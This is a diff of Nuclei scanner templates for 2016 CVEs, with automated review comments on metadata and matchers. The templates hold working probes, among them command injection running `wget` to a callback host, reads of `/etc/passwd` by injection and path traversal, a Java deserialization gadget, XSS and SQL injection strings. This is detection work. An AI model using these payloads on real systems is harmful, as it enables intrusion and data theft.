@@ -1,24 +1,36 @@ id: CVE-2016-10973 info: - name: brafton WordPress Plugin <=3.4.7 - Reflected XSS + name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting author: Harsh severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-10973 cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54991 + cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2016,xss,brafton,reflected,auth + max-request: 2 + vendor: brafton + product: brafton + framework: wordpress + tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
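Review bot: The added `remediation` says to upgrade to "version 3.4.9 or higher", but the unchanged description two lines above says the plugin is affected "before 3.4.8", i.e. 3.4.8 is the fixed release; the two should agree, e.g. `Upgrade the Brafton plugin to version 3.4.8 or later.` The context line `https://nvd.nist.gov/vuln/detail/CVE-2026-10973` has the wrong year in the URL (this is CVE-2016-10973) and still points at a non-existent NVD entry on the new side; it should be `https://nvd.nist.gov/vuln/detail/CVE-2016-10973`. The raw requests under `http:` continue outside this hunk.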
@@ -26,16 +38,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) HTTP/1.1 + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))")' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and +# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml b/nuclei-templates/CVE-2016/CVE-2016-1555.yaml deleted file mode 100644 index 7868529960..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml +++ /dev/null 
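Review bot: Removing `cookie-reuse: true` leaves the second raw request dependent on the engine carrying the login session's cookies across raw requests by default; recent nuclei releases do that as far as I know, but nothing here pins a minimum engine version, so it is worth confirming, because without the session the `admin.php` page is never reached and the `body_2` conditions can only fail. The new `contains(body_2, "tab = alert(document.domain);")` condition is tighter than the one it replaces, which is good; the matcher block is complete within this hunk.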
@@ -1,31 +0,0 @@ -id: CVE-2016-1555 -info: - name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution - author: gy741 - severity: critical - description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2016-1555 - cwe-id: CWE-77 - tags: netgear,rce,oast,router - -requests: - - raw: - - | - POST /boardDataWW.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2016/cve-2016-2004.yaml b/nuclei-templates/CVE-2016/CVE-2016-2004.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-2004.yaml rename to nuclei-templates/CVE-2016/CVE-2016-2004.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-3088.yaml b/nuclei-templates/CVE-2016/CVE-2016-3088.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-3088.yaml rename to nuclei-templates/CVE-2016/CVE-2016-3088.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-3510.yaml b/nuclei-templates/CVE-2016/CVE-2016-3510.yaml index e8ed87a996..64e8374d4e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-3510.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-3510.yaml 
@@ -6,38 +6,55 @@ info: severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. - reference: - - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. + reference: + - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html + - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html + - http://www.securitytracker.com/id/1036373 + - https://www.tenable.com/security/research/tra-2016-21 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000 + epss-score: 0.04254 + epss-percentile: 0.92018 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network - + max-request: 2 + vendor: oracle + product: weblogic_server + tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network variables: start: 
"016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "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" tcp: - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + - data: "t3 12.2.1 + + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" read: 1024 - - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" host: - "{{Hostname}}" - port: 7001 + - "{{Host}}:7001" read-size: 4 - matchers: - type: word part: interactsh_protocol words: - "dns" +# digest: 490a00463044022043a31295126d58fbaa38a9cc0e672c6e4196a6b16f7a075def013ab769902eac02206d807cc60eaf030e3c730656b6e69dde708c01dc451d042f9962615d675ac8fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-4437.yaml b/nuclei-templates/CVE-2016/CVE-2016-4437.yaml index fa73c5b8f7..33d3868821 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-4437.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-4437.yaml 
@@ -6,6 +6,10 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + impact: | + Remote code execution + remediation: | + Upgrade to a patched version of Apache Shiro reference: - https://github.com/Medicean/VulApps/tree/master/s/shiro/1 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 @@ -17,13 +21,14 @@ info: cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 - epss-score: 0.97483 + epss-score: 0.97507 + epss-percentile: 0.99981 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: shiro - tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization + tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast http: - raw: @@ -38,3 +43,4 @@ http: part: interactsh_protocol words: - dns +# digest: 4b0a00483046022100fb046cc08189c3a3e20f44ffc1f443e657b070eae65463098ac3eb10d32969300221009acd50c19a5ec2239925b1ff303224e37e8b277b8b11b7f92b84141650cd97f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-4975.yaml b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-4975.yaml rename to nuclei-templates/CVE-2016/CVE-2016-4975.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-6195.yaml b/nuclei-templates/CVE-2016/CVE-2016-6195.yaml index fcc5a820b8..76c43f3f6e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6195.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6195.yaml 
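Review bot: The added `remediation` text `Upgrade to a patched version of Apache Shiro` is vaguer than the description two lines above it, which already names the fixed release; `Upgrade to Apache Shiro 1.2.5 or later` tells an operator what to check. Likewise the one-line `impact: Remote code execution` could say where it comes from, since the description and the `deserialization` tag already establish it: `Remote code execution via deserialization of the "remember me" cookie when no cipher key is configured`.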
@@ -1,22 +1,36 @@ id: CVE-2016-6195 info: - name: vBulletin <= 4.2.3 SQL Injection + name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO - severity: high + severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. + remediation: | + Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - - https://www.securityfocus.com/bid/94312 - https://enumerated.wordpress.com/2016/07/11/1/ - + - http://www.vbulletin.org/forum/showthread.php?t=322848 + - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 + epss-score: 0.00284 + epss-percentile: 0.68042 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 6 + vendor: vbulletin + product: vbulletin + shodan-query: title:"Powered By vBulletin" + tags: cve2016,cve,vbulletin,sqli,forum,edb http: - method: GET 
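Review bot: The new `metadata` block writes `verified: "true"` as a quoted string, while the cve-2016-10367 hunk in this same patch changes exactly that form to the bare boolean `verified: true` (and the CVE-2016-3510 hunk already uses the boolean); use `verified: true` here so the field has one type across the repo. The `http:` request list this hunk opens continues past the hunk.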
@@ -28,11 +42,18 @@ http: - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + stop-at-first-match: true - - matchers-condition: or + matchers-condition: and matchers: - type: word part: body words: - "type=dberror" + + - type: status + status: + - 200 + - 503 + condition: or +# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml index 86c405ed7a..0cf11fcf80 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml @@ -1,10 +1,9 @@ id: CVE-2016-6210 - info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: network,openssh + tags: cve,cve2016,network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -16,18 +15,15 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/nuclei-templates/CVE-2016/CVE-2016-6277.yaml b/nuclei-templates/CVE-2016/CVE-2016-6277.yaml deleted file mode 100644 index c94e539a5d..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-6277.yaml +++ /dev/null 
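Review bot: The OpenSSH banner regex kept on the new side of CVE-2016-6210, `'(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'`, has a misplaced caret in its last character class: `[\n^\r]` is a literal set of newline, `^` and CR, not a negated class, so a 7.0–7.2 banner with a patch suffix such as `SSH-2.0-OpenSSH_7.2p2` (constructed) is not matched — `[^\d]` consumes the `p` and `[\n^\r]+` cannot consume the `2` — although it is inside the affected range. The second alternative should mirror the first, `7\.[0-2][^\d][^\r\n]+`. The commit only touches blank lines, tags and the trailing newline in this file, so the false negative survives it.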
@@ -1,29 +0,0 @@ -id: CVE-2016-6277 -info: - name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE - author: pikpikcu - severity: high - description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - reference: - - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://www.kb.cert.org/vuls/id/582384 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2016-6277 - cwe-id: CWE-352 - tags: cve,cve2016,netgear,rce,iot -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-6601.yaml b/nuclei-templates/CVE-2016/CVE-2016-6601.yaml index dd6f63cd03..96c42c3ebd 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-6601.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-6601.yaml 
@@ -5,18 +5,31 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. + remediation: | + Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601 + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - tags: edb,cve,cve2016,zoho,lfi,webnms + epss-score: 0.97503 + epss-percentile: 0.99977 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: webnms_framework + tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp -requests: +http: - method: GET path: - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd" @@ -30,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-7834.yaml b/nuclei-templates/CVE-2016/CVE-2016-7834.yaml index b2110f66af..b621310690 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-7834.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-7834.yaml 
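Review bot: The added `impact` text claims `remote code execution, or complete compromise of the affected system`, but the check, the `CWE-22` classification and the vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` in the same hunk all describe an unauthenticated arbitrary file read with no integrity or availability impact; `Unauthenticated read of arbitrary files from the server via the fileName parameter` would state what the template actually demonstrates. The `http:` request block continues past the hunk.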
@@ -6,21 +6,31 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + impact: | + An attacker can gain unauthorized access to the camera and potentially control its functions. + remediation: | + Upgrade to the latest version of the firmware provided by Sony. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 - remediation: | - Upgrade to the latest version of the firmware provided by Sony. + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 - tags: sony,backdoor,unauth,telnet,iot,camera + epss-score: 0.00186 + epss-percentile: 0.55032 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: sony + product: snc_series_firmware + tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera -requests: +http: - method: GET path: - "{{BaseURL}}/command/prima-factory.cgi" @@ -40,5 +50,4 @@ requests: - type: status status: - 204 - -# Enhanced by cs 09/23/2022 +# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-8706.yaml b/nuclei-templates/CVE-2016/CVE-2016-8706.yaml index 4a632c40cf..0730a6857e 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-8706.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-8706.yaml 
@@ -17,8 +17,8 @@ info: cvss-score: 8.1 cve-id: CVE-2016-8706 cwe-id: CWE-190 - epss-score: 0.90293 - epss-percentile: 0.98508 + epss-score: 0.89998 + epss-percentile: 0.98714 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -54,4 +54,4 @@ javascript: words: - "Auth failure" negative: true -# digest: 4b0a00483046022100860c0dd4dc35a6f64cf59dc33739dff50d020e1336a6a88ddd5e7db1c511436f022100f39967d90d2c746119d59bfb5a31a2e24c77d456aed6162ae84416b7afefa9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-0957.yaml b/nuclei-templates/CVE-2016/cve-2016-0957.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-0957.yaml rename to nuclei-templates/CVE-2016/cve-2016-0957.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000129.yaml b/nuclei-templates/CVE-2016/cve-2016-1000129.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000129.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000129.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000132.yaml b/nuclei-templates/CVE-2016/cve-2016-1000132.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000132.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000132.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000133.yaml b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml new file mode 100644 index 0000000000..64968b022f --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000134.yaml b/nuclei-templates/CVE-2016/cve-2016-1000134.yaml new file mode 100644 index 0000000000..d11a917306 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000134.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
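Review bot: In the new `cve-2016-1000133.yaml` the body matcher is `words: - ""`; an empty word matches every response, so only the `text/html` header and the 200 status are really checked and the template cannot distinguish a reflected payload from any ordinary page. If the empty string is an artifact of the reflected `<script>` payload being stripped when this diff was rendered it is harmless, but if it is in the file the matcher should carry the decoded form of what the URL sends (`alert(document.domain)` inside the closing/opening script tags). The same `""` appears in cve-2016-1000134 below, in cve-2016-1000141 and cve-2016-1000142 on the following lines, and in the `contains(body_2, "")` / `!contains(body_3, "")` DSL of cve-2016-10940. Separately, `reference:` is a bare scalar here while every other template in the patch uses a list.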
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml b/nuclei-templates/CVE-2016/cve-2016-1000139.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000139.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000139.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000141.yaml b/nuclei-templates/CVE-2016/cve-2016-1000141.yaml new file mode 100644 index 0000000000..6450289e6c --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000141.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000141 + +info: + name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000141 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000142.yaml b/nuclei-templates/CVE-2016/cve-2016-1000142.yaml new file mode 100644 index 0000000000..2d1df9a78d --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000142.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2016-1000142 + +info: + name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: + - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000142 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000153.yaml b/nuclei-templates/CVE-2016/cve-2016-1000153.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000153.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000153.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10367.yaml b/nuclei-templates/CVE-2016/cve-2016-10367.yaml index 8e41296b51..c8b0252ad6 100644 --- a/nuclei-templates/CVE-2016/cve-2016-10367.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-10367.yaml 
@@ -5,28 +5,39 @@ info: author: 0x_akoko severity: high description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 - https://nvd.nist.gov/vuln/detail/CVE-2016-10367 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 